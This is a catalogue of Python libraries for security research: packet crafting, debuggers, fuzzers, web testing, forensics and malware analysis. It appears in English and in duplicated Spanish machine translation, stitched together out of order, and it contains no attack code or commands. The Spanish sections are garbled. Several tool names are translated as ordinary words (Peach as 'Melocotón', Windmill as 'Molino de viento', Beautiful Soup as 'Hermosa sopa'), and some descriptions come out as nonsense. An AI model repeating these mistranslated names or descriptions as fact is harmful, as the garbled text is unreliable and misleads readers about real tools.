Trenzado : impulsado la creación de redes de máquinas de eventos
Espuma : ligero cliente SOAP para consumir servicios Web
M2crypto : completar la mayoría de OpenSSL contenedor
NetworkX : la colección de gráfica (bordes, nodos)
pyparsing : módulo de análisis general
LXML lengua más rica en funciones y fácil de usar: la biblioteca para trabajar con XML y HTML en lenguajes de programación Python
Pexpect : control y automatización de otros programas similares a Don Libes «esperar» el sistema
Sikuli , tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Secuencias de comandos en Jython
Visto en http://dirk-loss.de/python-tools.htm
Especialmente indicado si uno está involucrado en la investigación de vulnerabilidades, la ingeniería inversa o de pruebas de penetración, la mayoría de las herramientas mencionadas están escritas en Python, otros son simplemente enlaces de Python para las bibliotecas C, es decir, hacer que las bibliotecas fácilmente utilizable a partir de programas Python.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.
Network
Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
Dirtbags py-pcap: read pcap files without libpcap
flowgrep: grep through packet payloads using regular expressions
httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
Debugging and reverse engineering
Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
Immunity Debugger: scriptable GUI and command line debugger
IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
pefile: read and work with Portable Executable (aka PE) files
pydasm: Python interface to the libdasm x86 disassembling library
PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
diStorm64: disassembler library for AMD64, licensed under the BSD license
python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
Fuzzing
Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
antiparser: fuzz testing and fault injection API
TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
untidy: general purpose XML fuzzer
Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
SMUDGE
Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
Fuzzbox: multi-codec media fuzzer
Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
WSBang: perform automated security testing of SOAP based web services
Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
fuzzer.py (feliam): simple fuzzer by Felipe Andres anzano
Web
ProxMon: processes proxy logs and reports discovered issues
WSMap: find web service endpoints and discovery files
Twill: browse the Web from a command-line interface. Supports automated Web testing
Windmill: web testing tool designed to let you painlessly automate and debug your web application
FunkLoad: functional and load web tester
Forensics
Volatility: extract digital artifacts from volatile memory (RAM) samples
SandMan: read the hibernation file, regardless of Windows version
LibForensics: library for developing digital forensics applications
TrIDLib, identify file types from their binary signatures. Now includes Python binding
Malware analysis
pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
pyClamAV: add virus detection capabilities to your Python software
Misc
InlineEgg: toolbox of classes for writing small assembly programs in Python
Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
RevHosts: enumerate virtual hosts for a given IP address
simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
Other useful libraries and tools
IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
Beautiful Soup: HTML parser optimized for screen-scraping
matplotlib: make 2D plots of arrays
Mayavi: 3D scientific data visualization and plotting
RTGraph3D: create dynamic graphs in 3D
Twisted: event-driven networking engine
Suds: lightweight SOAP client for consuming Web Services
M2Crypto: most complete OpenSSL wrapper
NetworkX: graph library (edges, nodes)
pyparsing: general parsing module
lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
Pexpect: control and automate other programs, similar to Don Libes `Expect` system
Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
Red
Scapy : enviar, rastrear y analizar y establecer los paquetes de red. Utilizable de forma interactiva o como una biblioteca
pypcap , Pcapy y pylibpcap : varios enlaces de Python para diferentes libpcap
libdnet : rutinas de bajo nivel de redes, incluida la interfaz de búsqueda y transmisión de la trama Ethernet
dpkt :, la simple creación rápida de paquetes / análisis, con las definiciones de la base de protocolos TCP / IP
Impacket : y decodificar los paquetes de la red de artesanía. Incluye soporte para los protocolos de nivel superior como NMB y SMB
pynids : libnids ofrece envoltorio inhalación, la desfragmentación IP, TCP y arroyo montaje escaneo de puertos de detección
Dirtbags py-pcap : leer archivos pcap sin libpcap
flowgrep : grep a través de paquetes de carga útil el uso de expresiones regulares
httplib2 : completa biblioteca de cliente HTTP que soporta muchas características al margen de otras bibliotecas HTTP
Depuración y la ingeniería inversa
Paimei : Marco de ingeniería inversa, incluye PyDBG , PIDA, PGraph
Inmunidad depurador : secuencias de comandos de GUI y depurador de línea de comandos
IDAPython : IDA Pro plugin que integra el lenguaje de programación Python, lo que permite secuencias de comandos para ejecutar en IDA Pro
PyEMU : totalmente scripts emulador de IA-32, útil para el análisis de malware
Pefile : leer y trabajar con archivos Portable Executable (aka PE)
pydasm : Python interfaz para el libdasm x86 desmontar la colección de
PyDbgEng : Python contenedor para la depuración del motor de Microsoft Windows
uhooker : interceptar llamadas a llamadas a la API dentro de archivos DLL, y también se ocupa de arbitraria en el archivo ejecutable en la memoria
diStorm64 : desensamblador colección para AMD64, licenciado bajo la licencia BSD
python-ptrace : usando ptrace depurador (Linux, BSD y Darwin llamada al sistema para rastrear procesos) escrito en Python
Fuzzing
Sulley : desarrollo fuzzer marco de pruebas y la pelusa que consiste de varios componentes extensibles
Melocotón fuzzing Plataforma : fuzzing marco extensible para la generación y la mutación basada fuzzing
antiparser : pruebas de pelusa y la inyección de fallos de la API
TAOF , incluyendo ProxyFuzz , una en-el-medio-no determinista red fuzzer-hombre
desordenado : el propósito fuzzer XML generales
Powerfuzzer : altamente automatizada y completamente fuzzer web personalizable (protocolo basado fuzzer solicitud HTTP)
Filep : fuzzer archivo. Genera mutado archivos de una lista de archivos de origen y se alimenta a un programa externo en lotes
Mancha
Maestra : archivo en formato sonda sobre la marcha y los protocolos con los datos con formato incorrecto, basándose en patrones pre-definidos
Fuzzbox : codec de los medios de comunicación multi-fuzzer
Forense fuzzing Herramientas : generar archivos de fuzz, los sistemas de archivos fuzz, y sistemas de archivos que contienen los archivos de fuzz para poner a prueba la solidez de las herramientas de análisis forense y sistemas de examen
Windows IPC fuzzing Herramientas : herramientas utilizadas para pelusa de las aplicaciones que utilizan Windows mecanismos de comunicación entre procesos
WSBang : realizar pruebas de seguridad automatizadas de servicios web basados en SOAP
Construir : biblioteca para el análisis y la construcción de estructuras de datos (binario o de texto). Definir las estructuras de datos de forma declarativa
fuzzer.py (feliam) : fuzzer simple por Felipe Andrés Anzano
Web
ProxMon : proxy procesos de registros e informes de los problemas detectados
WSMap : encontrar el servicio web, los puntos finales y los archivos de descubrimiento
Sarga : navegar por la Web desde una interfaz de línea de comandos. Soporta pruebas automatizadas Web
Molino de viento : prueba de la herramienta web diseñada para que pueda sin dolor automatizar y depurar la aplicación Web
FunkLoad : web, probador de carga y funcional
Forense
Volatilidad : extracto de distorsiones digitales de memoria volátil (RAM) de las muestras
SandMan : leer el archivo de hibernación, independientemente de la versión de Windows
LibForensics : biblioteca para desarrollar aplicaciones de análisis forense digital
TrIDLib , identificar tipos de archivo de sus firmas binarias. Ahora incluye Python
Análisis de malware
pyew : línea de comandos de editor hexadecimal y desensamblador, principalmente para analizar malware
Stevens PDF herramientas Didier : analizar, identificar y crear archivos PDF (incluye PDFiD , pdf-parser y pdf-hacer y MPDF)
Origapy : Python Ruby contenedor para el módulo de Origami que desinfecta archivos PDF
Exefilter : formatos de archivo de filtro de e-mails, páginas web o archivos. Detecta muchos formatos de archivo comunes y pueden eliminar el contenido activo
pyClamAV : añadir capacidades de detección de virus para su software Python
Otros
InlineEgg : caja de herramientas de clases para escribir conjunto de pequeños programas en Python
Exomind : marco para la creación de gráficos decoradas y desarrollo de fuentes de inteligencia módulos abiertos y las ideas, centrada en servicios de redes sociales, motores de búsqueda y mensajería instantánea
RevHosts : enumerar las máquinas virtuales para una determinada dirección IP
simplejson : codificador / decodificador de JSON, por ejemplo, para el uso de AJAX API de Google
Otras bibliotecas y herramientas útiles
IPython : Python shell interactivo mejorado con muchas características para la introspección de objetos, acceso a shell del sistema, y su especial sistema de mando propia
Hermosa sopa : analizador HTML optimizados para la pantalla-raspando
matplotlib : hacer diagramas 2D de matrices
Mâyâvi : visualización científica de datos 3D y el trazado
RTGraph3D : crear gráficos dinámicos en 3D
Trenzado : impulsado la creación de redes de máquinas de eventos
Espuma : ligero cliente SOAP para consumir servicios Web
M2crypto : completar la mayoría de OpenSSL contenedor
NetworkX : la colección de gráfica (bordes, nodos)
pyparsing : módulo de análisis general
LXML lengua más rica en funciones y fácil de usar: la biblioteca para trabajar con XML y HTML en lenguajes de programación Python
Pexpect : control y automatización de otros programas similares a Don Libes «esperar» el sistema
Sikuli , tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Secuencias de comandos en Jython